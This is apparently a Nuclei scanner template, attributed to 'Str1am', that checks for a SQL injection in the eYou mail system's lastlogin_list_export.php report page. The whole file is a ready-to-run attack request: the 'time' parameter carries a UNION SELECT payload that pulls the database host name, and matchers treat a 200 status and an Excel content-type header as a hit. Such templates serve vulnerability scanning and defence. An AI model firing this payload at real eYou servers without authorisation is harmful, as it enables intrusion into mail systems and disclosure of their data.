id: eyou-list-export-sqli

info:
  name: eYou /php/report/lastlogin_list_export.php SQL注入漏洞
  author: Str1am
  severity: high
  tags: eYou,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/php/report/lastlogin_list_export.php?stime=a&time=0000-00-01%20union%20select%20@@hostname,0x7e7077,3%20%23"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "application/vnd.ms-excel"
        part: header
        condition: and
